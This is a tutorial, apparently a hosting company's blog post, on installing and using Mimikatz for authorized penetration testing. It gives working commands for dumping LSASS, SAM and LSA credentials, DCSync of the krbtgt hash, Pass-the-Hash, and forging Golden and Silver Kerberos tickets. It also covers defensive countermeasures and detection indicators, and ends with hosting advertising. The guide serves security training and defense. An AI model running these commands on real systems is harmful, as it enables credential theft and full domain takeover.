How to Install and Use Mimikatz: A Complete Guide for Security Professionals

Mimikatz is one of the most well-known and widely discussed tools in the cybersecurity world. Originally developed as a proof-of-concept to demonstrate vulnerabilities in Windows authentication, it has become an essential instrument in the toolkit of penetration testers, red teamers, and security researchers. This guide provides a thorough walkthrough of what Mimikatz is, who uses it, and how to install and operate it responsibly in a controlled environment.

> Legal Disclaimer: Mimikatz must only be used on systems you own or have explicit written authorization to test. Unauthorized use is illegal and may result in serious criminal penalties. This guide is intended solely for educational purposes and legitimate security testing.

—

What Is Mimikatz?

Mimikatz is an open-source Windows security tool created by French security researcher Benjamin Delpy. Its primary function is to extract authentication credentials — including plaintext passwords, NTLM password hashes, PIN codes, and Kerberos tickets — directly from a Windows system's memory (specifically from the LSASS process).

Because Windows historically cached credentials in memory to support seamless authentication across services, Mimikatz was able to expose a fundamental design weakness in how the operating system handled sensitive authentication data. Microsoft has since introduced mitigations such as Credential Guard and Protected Users security group, but Mimikatz continues to evolve alongside these defenses, making it an invaluable reference tool for understanding the current threat landscape.

Key Capabilities of Mimikatz

• Plaintext password extraction from Windows memory (LSASS)
• NTLM hash dumping from the SAM database and Active Directory
• Kerberos ticket extraction and manipulation (Golden Ticket, Silver Ticket attacks)
• Pass-the-Hash (PtH) authentication using captured hashes
• Pass-the-Ticket (PtT) attacks using stolen Kerberos tickets
• DCSync attacks to replicate domain controller data without direct access

—

Who Uses Mimikatz and Why?

Legitimate Security Use Cases

Mimikatz is primarily used by information security professionals in the following contexts:

• Penetration testing — Simulating real-world credential-theft attacks to assess how well an organization's defenses hold up against an adversary who has gained initial access.
• Red team operations — Emulating advanced persistent threat (APT) techniques to test detection and response capabilities of blue teams and SOC analysts.
• Security audits — Evaluating whether passwords and Kerberos tickets are stored and protected in accordance with security best practices.
• Training and awareness — Demonstrating to system administrators and engineers exactly how credential-based attacks work in practice, making abstract threats tangible and actionable.
• Vulnerability research — Identifying new weaknesses in Windows authentication mechanisms before malicious actors can exploit them.

Malicious Abuse

Unfortunately, Mimikatz is also a favorite tool among threat actors due to its effectiveness. Common malicious use cases include:

• Pass-the-Hash attacks — Authenticating to systems using captured NTLM hashes without ever knowing the original plaintext password.
• Pass-the-Ticket attacks — Using stolen Kerberos tickets to impersonate legitimate users across a network.
• Post-exploitation persistence — Harvesting credentials after an initial breach to move laterally through a network and escalate privileges.
• Golden Ticket attacks — Forging Kerberos Ticket Granting Tickets (TGTs) to gain persistent, near-unlimited access to domain resources.

Understanding how attackers use Mimikatz is precisely why defenders need to be familiar with it. If you are running a VPS Hosting environment or managing dedicated infrastructure, knowing these attack vectors helps you build more resilient defenses.

—

Prerequisites

Before proceeding, ensure the following conditions are met in your authorized test environment:

> Best Practice: Always perform Mimikatz testing inside an isolated virtual machine or a dedicated lab server. If you need a secure, isolated environment for penetration testing labs, consider deploying a VPS Hosting instance with a Windows image to keep your tests completely separate from production infrastructure.

—

Step 1: Download Mimikatz

1.1 Visit the Official GitHub Repository

Mimikatz is maintained as an open-source project. Always download it from the official source to avoid tampered or trojanized versions:

Official Repository: https://github.com/gentilkiwi/mimikatz

1.2 Download the Latest Release

1. Navigate to the Releases section of the repository (right-hand sidebar or via the /releases URL path).
2. Locate the most recent stable release.
3. Download the pre-compiled archive — typically named mimikatz_trunk.zip.

1.3 Extract the Archive

1. Right-click the downloaded ZIP file.
2. Select Extract All…
3. Choose a destination directory, for example: C:SecurityToolsMimikatz

After extraction, you will find two subdirectories:

• x64 — 64-bit binaries (use this on modern systems)
• Win32 — 32-bit binaries (for legacy systems)

The primary executable you will work with is mimikatz.exe.

—

Step 2: Run Mimikatz

2.1 Open an Elevated Command Prompt

Mimikatz requires administrative privileges to interact with protected memory regions. To launch an elevated shell:

1. Press Windows + X
2. Select Command Prompt (Admin) or Windows PowerShell (Admin)
3. Click Yes on the UAC prompt

2.2 Navigate to the Mimikatz Directory

cd C:SecurityToolsMimikatzx64

Verify that mimikatz.exe is present in this directory:

dir mimikatz.exe

2.3 Launch Mimikatz

mimikatz.exe

If the tool starts successfully, you will see the Mimikatz banner and the interactive prompt:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

The mimikatz # prompt confirms the tool is running and ready to accept commands.

2.4 Enable Debug Privileges

Before running most credential extraction commands, elevate Mimikatz's own privileges within the session:

mimikatz # privilege::debug

Expected output:

Privilege '20' OK

This grants Mimikatz the SeDebugPrivilege right, which is necessary to read the memory of protected processes like LSASS.

—

Step 3: Core Mimikatz Commands

3.1 Extract Plaintext Passwords from Memory

This is the most well-known Mimikatz capability. It reads credentials cached by the WDigest authentication provider directly from LSASS memory:

mimikatz # sekurlsa::logonpasswords

What it returns:

• Logged-on usernames
• Domain names
• Plaintext passwords (if WDigest caching is enabled)
• NTLM hashes
• SHA1 hashes
• Kerberos credentials

> Note: On Windows 8.1 and later, Microsoft disabled WDigest plaintext caching by default. However, attackers (and testers) can re-enable it via a registry key, which is why this remains a relevant test case.

3.2 Display Stored Passwords (Alternative Command)

mimikatz # sekurlsa::passwords

This command provides a simplified view of credentials available in system memory.

3.3 Extract Credentials from a Memory Dump File

If you cannot run Mimikatz directly on the target system, you can first capture an LSASS memory dump and analyze it offline:

Create the dump using Task Manager:

1. Open Task Manager → Details tab
2. Right-click lsass.exe → Create dump file

Or use ProcDump (from Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analyze the dump with Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 List Kerberos Tickets

To enumerate all Kerberos tickets present in the current logon session:

mimikatz # kerberos::list

To list tickets with full details including session keys:

mimikatz # kerberos::list /export

This exports each ticket as a .kirbi file, which can be used in Pass-the-Ticket attacks.

3.5 Export Credentials to a File

To save the output of a credential dump to a text file for later analysis:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

The output will be written to credentials.txt in the specified path.

—

Step 4: Advanced Mimikatz Techniques

4.1 Pass-the-Hash (PtH) Attack

Pass-the-Hash allows authentication to a remote system using a captured NTLM hash, without needing the plaintext password:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

This spawns a new cmd.exe process authenticated as the specified user using the hash.

4.2 Golden Ticket Attack

A Golden Ticket is a forged Kerberos TGT signed with the KRBTGT account's password hash, granting the holder near-unlimited access to domain resources. This requires the KRBTGT hash, which can be obtained via DCSync:

Step 1 — DCSync to extract KRBTGT hash:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Step 2 — Create the Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Step 3 — Inject the ticket:

mimikatz # kerberos::ptt golden.kirbi

4.3 Dump NTLM Hashes from SAM Database

To extract local account hashes from the SAM database (requires SYSTEM privileges):

mimikatz # lsadump::sam

4.4 Dump Secrets from LSA

mimikatz # lsadump::secrets

This retrieves LSA secrets, which may include service account credentials, cached domain credentials, and other sensitive data stored by the Local Security Authority.

4.5 Silver Ticket Attack

A Silver Ticket targets a specific service rather than the entire domain. It requires the NTLM hash of the target service account:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Step 5: Defensive Countermeasures

Understanding how Mimikatz works is only half the equation. The other half is knowing how to defend against it. If you manage Windows servers — whether on Dedicated Servers or cloud-based infrastructure — the following mitigations are critical:

5.1 Enable Credential Guard

Windows Credential Guard uses virtualization-based security (VBS) to isolate LSASS in a protected container, preventing Mimikatz from reading credentials directly from memory.

Enable via Group Policy:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Disable WDigest Authentication

Prevent plaintext password caching by disabling WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Add Users to the Protected Users Group

Members of the Protected Users security group cannot authenticate using NTLM, DES, or RC4 Kerberos encryption, significantly limiting the effectiveness of credential-theft attacks.

5.4 Implement LSA Protection (RunAsPPL)

Enable Protected Process Light (PPL) for LSASS to prevent unauthorized memory access:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Monitor for Mimikatz Indicators

Configure your SIEM or EDR solution to alert on:

• Access to lsass.exe memory from unexpected processes
• SeDebugPrivilege being granted to non-system processes
• Suspicious sekurlsa, kerberos, or lsadump command patterns in process logs
• Unusual LSASS dump file creation events (Event ID 4656, 4663)

5.6 Keep Systems Patched

Many Mimikatz techniques exploit known vulnerabilities or legacy behaviors. Keeping Windows and Active Directory fully patched eliminates entire classes of attack vectors.

—

Mimikatz in the Context of Secure Hosting Infrastructure

For organizations running web applications, APIs, or internal services, the risk of credential theft extends beyond the local workstation. If an attacker gains access to your server environment, tools like Mimikatz can be used to escalate privileges and move laterally.

Choosing a hosting provider that prioritizes security at the infrastructure level is an important layer of defense. Whether you need Shared Web Hosting for smaller projects or Dedicated Servers for enterprise workloads, ensuring your hosting environment includes DDoS protection, network isolation, and regular security updates reduces your overall attack surface.

For teams managing Active Directory environments or Windows-based applications, pairing your infrastructure with properly configured SSL Certificates ensures that credentials transmitted between clients and servers are encrypted in transit — adding another layer of protection against interception.

—

Summary: Mimikatz Command Reference

—

Conclusion

Mimikatz remains one of the most powerful and instructive tools available to cybersecurity professionals. Its ability to expose fundamental weaknesses in Windows authentication mechanisms has driven significant improvements in how Microsoft designs credential protection — from Credential Guard to Protected Users to LSA PPL. For penetration testers, red teamers, and security researchers, a thorough understanding of Mimikatz is not optional; it is essential.

The key principles to always keep in mind:

• Always obtain explicit written authorization before using Mimikatz on any system.
• Use isolated environments — virtual machines or dedicated lab servers — to avoid accidental exposure.
• Understand the defenses as deeply as you understand the attacks.
• Stay current — both Mimikatz and Windows defenses evolve continuously.

By combining hands-on knowledge of tools like Mimikatz with a secure, well-configured hosting infrastructure, security teams can build defenses that are genuinely tested against real-world attack techniques rather than theoretical assumptions.

—

*AlexHost provides secure, high-performance hosting solutions designed with security-conscious professionals in mind. Explore our VPS Hosting plans and Dedicated Servers to build your next secure lab or production environment.*